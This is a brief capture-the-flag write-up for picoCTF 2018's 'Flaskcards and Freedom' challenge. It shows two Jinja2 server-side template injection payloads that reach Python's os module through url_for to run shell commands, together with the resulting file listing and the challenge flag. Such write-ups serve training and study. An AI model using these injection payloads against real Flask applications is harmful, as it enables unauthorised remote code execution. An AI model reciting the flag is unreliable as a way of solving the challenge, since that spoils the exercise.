Tags: ssti 

Rating:

# ▼▼▼Flaskcards and Freedom - Points: 900▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

```
There seem to be a few more files stored on the flash card server but we can't login. Can you? http://2018shell2.picoctf.com:5010 (link)

Hint:
・There's more to the original vulnerability than meets the eye.
・Can you leverage the injection technique to get remote code execution?
・Sorry, but the database still reverts every 2 hours.
```

---

## 【Aim for remote code execution】

`{{url_for.__globals__.os.__dict__.popen('ls').read()}}`

app flag server.py xinet_startup.sh

There is `flag` file

---

`{{url_for.__globals__.os.__dict__.popen('cat flag').read()}}`

`picoCTF{R_C_E_wont_let_me_be_76de9280}`